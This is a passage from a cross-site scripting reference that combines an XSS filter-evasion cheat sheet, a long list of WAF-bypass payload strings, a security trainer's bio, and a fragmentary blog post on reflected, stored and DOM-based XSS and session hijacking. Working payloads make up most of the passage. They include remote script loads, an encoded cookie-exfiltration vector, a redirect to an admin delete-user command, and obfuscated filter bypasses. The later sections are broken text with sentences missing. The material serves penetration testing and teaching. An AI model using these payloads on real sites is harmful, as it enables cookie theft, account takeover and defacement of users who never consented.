slash in your cross site scripting attack, which has come up at least
once in the real world:
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
Remote style sheet part 3
This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky.
According to RFC2616 setting a link header is not part of the
HTTP1.1 spec, however some browsers still allow it (like Firefox
and Opera). The trick here is that I am setting a header (which is
basically no different than in the HTTP header saying Link:
<http://xss.rocks/xss.css>; REL=stylesheet) and the
remote style sheet with my cross site scripting vector is running the
JavaScript, which is not supported in FireFox:
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; RE
L=stylesheet">
Remote style sheet part 4
This only works in Gecko rendering engines and works by binding
an XUL file to the parent page. I think the irony here is that
Netscape assumes that Gecko is safer and therefor is vulnerable to
this for the vast majority of sites:
<STYLE>BODY{-moz-binding:url("http://xss.rocks/
xssmoz.xml#xss")}</STYLE>
STYLE tags with broken up JavaScript for XSS
This XSS at times sends IE into an infinite loop of alerts:
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
STYLE attribute using a comment to break up expression
Created by Roman Ivanov
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
IMG STYLE with expression
This is really a hybrid of the above XSS vectors, but it really does
show how hard STYLE tags can be to parse apart, like above this
can send IE into a loop:
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
STYLE tag (Older versions of Netscape only)
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
STYLE tag using background-image
<STYLE>.XSS{background-
image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
STYLE tag using background
<STYLE type="text/
css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE
type="text/css">BODY{background:url("<javascript:alert>('XSS')"
)}</STYLE>
Anonymous HTML with STYLE attribute
IE6.0 and Netscape 8.1+ in IE rendering engine mode don’t really
care if the HTML tag you build exists or not, as long as it starts with
an open angle bracket and a letter:
<XSS STYLE="xss:expression(alert('XSS'))">
Local htc file
This is a little different than the above two cross site scripting
vectors because it uses an .htc file which must be on the same
server as the XSS vector. The example file works by pulling in the
JavaScript and running it as part of the style attribute:
<XSS STYLE="behavior: url(xss.htc);">
US-ASCII encoding
US-ASCII encoding (found by Kurt Huwig).This uses malformed
ASCII encoding with 7 bits instead of 8. This XSS may bypass
many content filters but only works if the host transmits in US-
ASCII encoding, or if you set the encoding yourself. This is more
useful against web application firewall cross site scripting evasion
than it is server side filter evasion. Apache Tomcat is the only
known server that transmits in US-ASCII encoding.
¼script¾alert(¢XSS¢)¼/script¾
META
The odd thing about meta refresh is that it doesn’t send a referrer in
the header - so it can be used for certain types of attacks where
you need to get rid of referring URLs:
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS
');">
META using data
Directive URL scheme. This is nice because it also doesn’t have
anything visibly that has the word SCRIPT or the JavaScript
directive in it, because it utilizes base64 encoding. Please see RFC
2397 for more details or go here or here to encode your own. You
can also use the XSS calculator below if you just want to encode
raw HTML or JavaScript as it has a Base64 encoding method:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64
,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
META with additional URL parameter
If the target website attempts to see if the URL
contains <http://>; at the beginning you can evade it with the
following technique (Submitted by Moritz Naumann):
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascri
pt:alert('XSS');">
IFRAME
If iframes are allowed there are a lot of other XSS problems as well:
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
IFRAME Event based
IFrames and most other elements can use event based mayhem
like the following… (Submitted by: David Cross)
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
FRAME
Frames have the same sorts of XSS problems as iframes
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
TD
Just like above, TD’s are vulnerable to BACKGROUNDs containing
JavaScript XSS vectors:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
DIV
DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV background-image with unicoded XSS exploit
This has been modified slightly to obfuscate the url parameter. The
original vulnerability was found by Renaud Lifchitz as a vulnerability
in Hotmail:
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
DIV background-image plus extra characters
Rnaske built a quick XSS fuzzer to detect any erroneous
characters that are allowed after the open parenthesis but before
the JavaScript directive in IE and Netscape 8.1 in secure site
mode. These are in decimal but you can include hex and add
padding of course. (Any of the following chars can be used: 1-32,
34, 39, 160, 8192-8.13, 12288, 65279):
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV expression
A variant of this was effective against a real world cross site
scripting filter using a newline between the colon and “expression”:
<DIV STYLE="width: expression(alert('XSS'));">
Downlevel-Hidden block
Only works in IE5.0 and later and Netscape 8.1 in IE rendering
engine mode). Some websites consider anything inside a comment
block to be safe and therefore does not need to be removed, which
allows our Cross Site Scripting vector. Or the system could add
comment tags around something to attempt to render it harmless.
As we can see, that probably wouldn’t do the job:
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
BASE tag
Works in IE and Netscape 8.1 in safe mode. You need the // to
comment out the next characters so you won’t get a JavaScript
error and your XSS tag will render. Also, this relies on the fact that
the website uses dynamically placed images
like images/image.jpg rather than full paths. If the path includes a
leading forward slash like /images/image.jpg you can remove
one slash from this vector (as long as there are two to begin the
comment this will work):
<BASE HREF="javascript:alert('XSS');//">
OBJECT tag
If they allow objects, you can also inject virus payloads to infect the
users, etc. and same with the APPLET tag). The linked file is
actually an HTML file that can contain your XSS:
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/
scriptlet.html"></OBJECT>
Using an EMBED tag you can embed a Flash movie that contains XSS
Click here for a demo: http://ha.ckers.org/xss.swf
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="alw
ays"></EMBED>
If you add the
attributes allowScriptAccess="never" and allownetworking="
internal" it can mitigate this risk (thank you to Jonathan Vanasco
for the info).
You can EMBED SVG which can contain your XSS vector
This example only works in Firefox, but it’s better than the above
vector in Firefox because it does not require the user to have Flash
turned on or installed. Thanks to nEUrOO for this one.
<EMBED SRC="data:image/
svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzI
wMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtb
G5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9
uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZ
D0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScript
Access="always"></EMBED>
Using ActionScript inside flash can obfuscate your XSS vector
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
XML data island with CDATA obfuscation
This XSS attack works only in IE and Netscape 8.1 in IE rendering
engine mode) - vector found by Sec Consult while auditing Yahoo:
<XML ID="xss"><I><B><IMG SRC="javas<!-- --
>cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
Locally hosted XML with embedded JavaScript that is generated using
an XML data island
This is the same as above but instead referrs to a locally hosted
(must be on the same server) XML file that contains your cross site
scripting vector. You can see the result here:
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
HTML+TIME in XML
This is how Grey Magic hacked Hotmail and Yahoo!. This only
works in Internet Explorer and Netscape 8.1 in IE rendering engine
mode and remember that you need to be between HTML and
BODY tags for this to work:
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XS
S")</SCRIPT>">
</BODY></HTML>
Assuming you can only fit in a few characters and it filters against .js
You can rename your JavaScript file to an image as an XSS vector:
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
SSI (Server Side Includes)
This requires SSI to be installed on the server to use this XSS
vector. I probably don’t need to mention this, but if you can run
commands on the server there are no doubt much more serious
issues:
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IP
T SRC=http://xss.rocks/xss.js></SCRIPT>'"-->
PHP
Requires PHP to be installed on the server to use this XSS vector.
Again, if you can run any scripts remotely like this, there are
probably much more dire issues:
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
IMG Embedded commands
This works when the webpage where this is injected (like a web-
board) is behind password protection and that password protection
works with other commands on the same domain. This can be used
to delete users, add users (if the user who visits the page is an
administrator), send credentials elsewhere, etc…. This is one of the
lesser used but more useful XSS vectors:
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
IMG Embedded commands part II
This is more scary because there are absolutely no identifiers that
make it look suspicious other than it is not hosted on your own
domain. The vector uses a 302 or 304 (others work too) to redirect
the image back to a command. So a normal <IMG
SRC="httx://badguy.com/a.jpg"> could actually be an attack
vector to run commands as the user who views the image link.
Here is the .htaccess (under Apache) line to accomplish the vector
(thanks to Timo for part of this):
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Cookie manipulation
Admittedly this is pretty obscure but I have seen a few examples
where <META is allowed and you can use it to overwrite cookies.
There are other examples of sites where instead of fetching the
username from a database it is stored inside of a cookie to be
displayed only to the user who visits the page. With these two
scenarios combined you can modify the victim’s cookie which will
be displayed back to them as JavaScript (you can also use this to
log people out or change their user states, get them to log in as
you, etc…):
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XS
S')</SCRIPT>">
UTF-7 encoding
If the page that the XSS resides on doesn’t provide a page charset
header, or any browser that is set to UTF-7 encoding can be
exploited with the following (Thanks to Roman Ivanov for this one).
Click here for an example (you don’t need the charset statement if
the user’s browser is set to auto-detect and there is no overriding
content-types on the page in Internet Explorer and Netscape 8.1 in
IE rendering engine mode). This does not work in any modern
browser without changing the encoding type which is why it is
marked as completely unsupported. Watchfire found this hole in
Google’s custom 404 script.:
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; chars
et=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/
SCRIPT+AD4-
XSS using HTML quote encapsulation
This was tested in IE, your mileage may vary. For performing XSS
on sites that allow <SCRIPT> but don’t allow <SCRIPT SRC... by
way of a regex filter /\<script\[^\>\]+src/i:
<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
For performing XSS on sites that allow <SCRIPT> but don’t allow \
<script src... by way of a regex filter /\<script((\\s+\\w+
(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\
s\*|\\s\*)src/i (this is an important one, because I’ve seen this
regex in the wild):
<SCRIPT =">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
Another XSS to evade the same filter, /\<script((\\s+\\w+(\\
s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\
*|\\s\*)src/i:
<SCRIPT a=">" '' SRC="httx://xss.rocks/xss.js"></SCRIPT>
Yet another XSS to evade the same filter, /\<script((\\s+\\w+
(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\
s\*|\\s\*)src/i. I know I said I wasn’t goint to discuss mitigation
techniques but the only thing I’ve seen work for this XSS example if
you still want to allow <SCRIPT> tags but not remote script is a state
machine (and of course there are other ways to get around this if
they allow <SCRIPT> tags):
<SCRIPT "a='>'" SRC="httx://xss.rocks/xss.js"></SCRIPT>
And one last XSS attack to evade, /\<script((\\s+\\w+(\\s\
*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\
s\*)src/i using grave accents (again, doesn’t work in Firefox):
<SCRIPT a=`>` SRC="httx://xss.rocks/xss.js"></SCRIPT>
Here’s an XSS example that bets on the fact that the regex won’t
catch a matching pair of quotes but will rather find any quotes to
terminate a parameter string improperly:
<SCRIPT a=">'>" SRC="httx://xss.rocks/xss.js"></SCRIPT>
This XSS still worries me, as it would be nearly impossible to stop
this without blocking all active content:
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="httx://
xss.rocks/xss.js"></SCRIPT>
URL string evasion
Assuming http://www.google.com/ is programmatically
disallowed:
IP versus hostname
<A HREF="http://66.102.7.147/">XSS</A>
URL encoding
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F
%6D">XSS</A>
DWORD encoding
Note: there are other of variations of Dword encoding - see the IP
Obfuscation calculator below for more details:
<A HREF="http://1113982867/">XSS</A>
Hex encoding
The total size of each number allowed is somewhere in the
neighborhood of 240 total characters as you can see on the second
digit, and since the hex number is between 0 and F the leading
zero on the third hex quotet is not required):
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
Octal encoding
Again padding is allowed, although you must keep it above 4 total
characters per class - as in class A, class B, etc…:
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
Base64 encoding
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN
0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
Mixed encoding
Let’s mix and match base encoding and throw in some tabs and
newlines - why browsers allow this, I’ll never know). The tabs and
newlines only work if this is encapsulated with quotes:
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
Protocol resolution bypass
// translates to http:// which saves a few more bytes. This is
really handy when space is an issue too (two less characters can
go a long way) and can easily bypass regex like (ht|
f)tp(s)?:// (thanks to Ozh for part of this one). You can also
change the // to \\\\. You do need to keep the slashes in place,
however, otherwise this will be interpreted as a relative path URL.
<A HREF="//www.google.com/">XSS</A>
Google “feeling lucky” part 1.
Firefox uses Google’s “feeling lucky” function to redirect the user to
any keywords you type in. So if your exploitable page is the top for
some random keyword (as you see here) you can use that feature
against any Firefox user. This uses Firefox’s keyword: protocol.
You can concatenate several keywords by using something like the
following keyword:XSS+RSnake for instance. This no longer works
within Firefox as of 2.0.
<A HREF="//google">XSS</A>
Google “feeling lucky” part 2.
This uses a very tiny trick that appears to work Firefox only,
because of it’s implementation of the “feeling lucky” function. Unlike
the next one this does not work in Opera because Opera believes
that this is the old HTTP Basic Auth phishing attack, which it is not.
It’s simply a malformed URL. If you click okay on the dialogue it will
work, but as a result of the erroneous dialogue box I am saying that
this is not supported in Opera, and it is no longer supported in
Firefox as of 2.0:
<A HREF="http://ha.ckers.org@google">XSS</A>
Google “feeling lucky” part 3.
This uses a malformed URL that appears to work in Firefox and
Opera only, because if their implementation of the “feeling lucky”
function. Like all of the above it requires that you are #1 in Google
for the keyword in question (in this case “google”):
<A HREF="http://google:ha.ckers.org">XSS</A>
Removing CNAMEs
When combined with the above URL, removing “www.” will save an
additional 4 bytes for a total byte savings of 9 for servers that have
this set up properly):
<A HREF="http://google.com/">XSS</A>
Extra dot for absolute DNS:
<A HREF="http://www.google.com./">XSS</A>
JavaScript link location:
<A HREF="javascript:document.location='http://
www.google.com/'">XSS</A>
Content replace as attack vector
Assuming http://www.google.com/ is programmatically replaced
with nothing). I actually used a similar attack vector against a
several separate real world XSS filters by using the conversion filter
itself (here is an example) to help create the attack vector
(IE: java&\#x09;script: was converted into java script:,
which renders in IE, Netscape 8.1+ in secure site mode and
Opera):
<A HREF="http://www.google.com/ogle.com/">XSS</A>
Character escape sequences
All the possible combinations of the character “<” in HTML and
JavaScript. Most of these won’t render out of the box, but many of
them can get rendered in certain circumstances as seen above.
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
Methods to Bypass WAF – Cross-Site Scripting
General issues
• Stored XSS
If an attacker managed to push XSS through the filter, WAF
wouldn’t be able to prevent the attack conduction.
• Reflected XSS in Javascript
Example: <script> ... setTimeout(\\"writetitle()\\",$\_GET\
[xss\]) ... </script>
Exploitation: /?xss=500); alert(document.cookie);//
• DOM-based XSS
Example: <script> ... eval($\_GET\[xss\]); ... </script>
Exploitation: /?xss=document.cookie
XSS via request Redirection.
• Vulnerable code:
...
header('Location: '.$_GET['param']);
...
As well as:
...
header('Refresh: 0; URL='.$_GET['param']);
...
• This request will not pass through the WAF:
/?param=<javascript:alert(document.cookie>)
• This request will pass through the WAF and an XSS attack will be
conducted in certain browsers.
/?param=<data:text/
html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
WAF ByPass Strings for XSS.
<Img src = x onerror = "javascript: window.onerror = alert;
throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>
"><img src="x:x" onerror="alert(XSS)">
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT:
alert(1)" http-equiv="refresh"/>
<svg><script
xlink:href=data:,window.open('https://www.google.com/')><
/script
<meta http-equiv="refresh"
content="0;url=javascript:confirm(1)">
<iframe
src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/
onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
On Mouse Over
<img src="/" =_=" title="onerror='prompt(1)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa
aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<form><button formaction=javascript:alert(1)>CLICKME
<input/onmouseover="javaSCRIPT:confirm(1)"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C
%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-
0080C7055A83"><PARAM NAME="DataURL"
VALUE="javascript:alert(1)"></OBJECT>
Filter Bypass Alert Obfuscation
(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)Burp Suite
Web vulnerability scannerBurp Suite EditionsRelease
Notes<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert('XSS')</script>
<script>alert('XSS');</script>
<script>alert('XSS')</script>
'><script>alert('XSS')</script>
<script>alert(/XSS/)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
'; alert(1);
')alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
<IMG SRC='javascript:alert('XSS');'>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<svg><style>{font-family:'<iframe/onload=confirm(1)>
'
<input/onmouseover="javaSCRIPT:confirm(1)"
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<script/	
src='https://dl.dropbox.com/u/13018058/js.js'
/	></script>
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg
onload=alert(1)>">
<svg><script
xlink:href=data:,window.open('https://www.google.com
/')></script
<svg><script
x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh"
content="0;url=javascript:confirm(1)">
<iframe
src=javascript:alert(document.location&r
par;>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1&
#x29;"/%00*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	 
src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-
cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2Ny
aXB0Pg=="	 >X</a
http://www.google<script
.com>alert(document.location)</script
<a href=[�]"�
onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\
uFF54\u1455\uFF11\u1450')/***/</script /***/
<a href="javascript:void(0)"
onmouseover=
javascript:alert(1)
>X</a>
<style/onload=<!--
	> alert (1)>
<///style///><span %2F
onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg'
onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=
confirm(1)>'
<blink/ onmouseover=prompt
(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.
cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1)
/*iframe/src*/>
</font>/<svg><style>{src:'<style/onload=this.onload=c
onfirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input
type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script
'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1)
{Opera}
<a href="javascript:\
u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="xg-
p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed
src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/m
isc/pdf/helloworld_js_X.pdf">
<object
data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/
misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a
href=javascript:alert(document.cookie&rp
ar;>Click Here</a>
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
http://www.<script>alert(1)</script .com
<iframe
src=j
	a
		v
	&Tab
;	a
				s
		&T
ab;		c
						r&New
Line;							i
	&Ta
b;						p
			&
Tab;					t
			&Tab
;						:a
		
									l
&Ta
b;											e

									&Tab
;			r
						&T
ab;							t
		
											&Ta
b;	28
								
								1
	&Ta
b;											&
Tab;			%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j	a	v	a	s	c	r	i	p	
t	:a	l	e	r	t	%28	1	%29></
iframe>
<img src=`xx:xx`onerror=alert(1)>
<meta http-equiv="refresh"
content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf"
allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\
u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\
u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \
u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\
u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\
u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\
u0061script,\u0061%6C%65%72%74(/
XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<div/onmouseover='alert(1)'> style="x:">
<div style="xg-
p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x
onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object
data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></
object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C
%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,<scrip&#
116 src="http:/&
#47sternefamil&
#121.net/foo.js&#
34></script>​">Cli
ck Me</a>
Home
Blog archive
Tips & Tricks
I'm Chris Dale from Norway, founder and principal consultant at River Security (https://riversecurity.eu/).
Along with my security expertise, I have a background from system development and application management.
Having a vast and broad experience in IT certainly help a great deal when working penetration tests and
incidents.
I am an open, sharing and engaging person to be around, some even think I'm funny. I am usually enthusiastic
and motivating when I work, and usually positive and optimistic about the general problems I encounter. I am
passionate about security, both IT and physical security, which is one of the reasons I do a lot of public
speaking at different events such as classes, conferences and workshops.
Driven by mottos such as "Magic is just science we don't understand yet" and "Think bad, do good", I attack
today's security challenges with eagerness and enthusiasm. I consider myself a pragmatic person, with the
ability to think outside the box, keeping the business in focus.
I also teach for SANS. My primary class I am teaching is Hacking Techniques, Exploits & Incident Handling.
This course prepares you for the GIAC Certification in Incident Handling (GCIH). I find it extremely
motivating and fun to teach others the art of security and hacking, and I often find that my passion and
enthusiasm rubs off on my students.
Blog
Cross site scripting is vulnerabilities in web applications that involves injecting valid
XSS is a very widespread vulnerability (see OWASP TOP 10) on the internet today. It
is both easy to eliminate and easy to detect. It is however usually harder to exploit than
for example SQL Injection. According to OWASP it is also stated to have moderate
looking) URL in some form or way for others to click on. It is important to note that
this type of payload is not stored on the system being attacked, e.g. in a database.
This type of a attack can be particular effective when you are dealing with focused
attacks against someone. As long as you can make someone click an URL with the
necessary payload there is a chance you can gain elevated privileges on the system.
Persistent
If you are able to make the end system store your payload (persist) the attacks becomes
much more dangerous very fast. A persistent XSS payload is reflected back to you
from the server (not just by clicking a link), usually because the XSS has been stored in
a database field or similar. The user is then presented with an attack served by the
Consider the following input is stored to database and then presented back to you on
your profile on the victim site:
This HTML code would give you a input field looking something like this:
If you are able to make the application accept and store unsanitized input, all you have
to do is make other users view your profile (or wherever the XSS is reflected back).
The payload would then be run on the client system in trust that the victim host was
These kinds of XSS can be not only hard to spot, but very devastating to the victims.
Just take a look at Samy worm which we described earlier on this article.
In the early days of the internet this XSS attack was very frequently
exploited. Regularly you would see this kind of exploit all over guestbooks, forums,
user reviews, chat rooms and so on. The following image describes a usual sight for an
In order to describe the seriousness of this type of attack consider if such an exploit
was present in eBay’s auction service. Anytime someone visits your auction they
automatically bid on the auction. This type of attack would most likely be trivially easy
DOM-based
Very similar to non-persistent, but where the javascript payload does not have to be
echoed back from the webserver. This can often be where simply the value from an
URL parameter is echoed back onto the page on the fly when loading using already
resident javascript.
Example:
http://victim/displayHelp.php?title=FAQ#
Of course criminals would modify the URL to make it more innocent looking for the
http://victim/displayHelp.php?title=FAQ#<scri
#112t>alert(docum
ent.cookie)</sc
ript>
You can even mask it better when sending to email clients that support HTML like this:
http://victim/displayHelp.php?title=FAQ
XSS defacement
Defacement is not a hard feat to accomplish once a XSS exploit is found. If the XSS is
persistent as well, it can be a hassle for the sysadmins to figure it out. If you include
As you can see from the image, this exploit was found on Amazon.com. It is in fact a
quite spectacular exploit because it involved the book XSS Attacks: Cross Site
Scripting Exploits and Defense which was uploaded to Amazon. The book was made
available for preview and thus, because no proper sanitation, the payloads in the book
Like in one of the examples above, once you can access users cookies you can also
grab sensitive information. Capturing sessionID’s can lead to session hijacking, which
Consider a site containing a search field that does not have proper input sanitizing. By
crafting a search query with a javascript payload you can gain access to data owned by
any user clicking the link. Such a query may look something like this:
">
Sitting on the other end, at the webserver, you will be receiving visitors revealing the
users cookie from the victim site. The data is sent through the x parameter where after
the double space is the users cookie. Even if the file that is being used is a .GIF file it
may still be a programmable script that stores the values in a database. You might
strike lucky if an administrator clicks the link, allowing you to steal their sessionID ,
hijacking their session and allowing you to become administrator of the victim site.
Using techniques like spam email, message board posts, IM messages, Social
If the .GIF file does not exist on the server you are controlling it will simply show up as
a 404 file not found, but still revealing the parameter to the file. The attacker can scrape
the server logs or use a custom written script to pick up all the session ID’s and proceed
to hijack them in order to further exploit the target. This is an example of what it could
The value PHPSESSID is the valuable part in this attack. Using this value as your own
may in most cases allow you to act as that person in the respective web-application.
Simply by editing your own cookies and replacing the PHPSESSID value with the new
value will usually allow you to become someone else.
Exploitation Framework. Once you unpack and run it on a webserver you can easily try
spawning a simulation of a victim (called a zombie) where you can very easy try out
valid HTML code into the packets going through your computer. Although this is a
rather new technique to me it is a very interesting and effective way of exploiting users.
This type of exploiting users via XSS was known to me via a presentation done on
Shank is a tool that lets you MiTM and at the same time downgrade any encoding, and
By combining Shank with BeEF you have a very interesting attack vector. This type of
attack will let you more easily persist hooks on victims. Some of the features this
vector allows for can be:
dangerous attack.
History on XSS
The Samy worm (js.spacehero)
viewing Samy’s profile and from there the worm installed itself in their profile
Another similar XSS exploit found on the same site. This exploit proves that
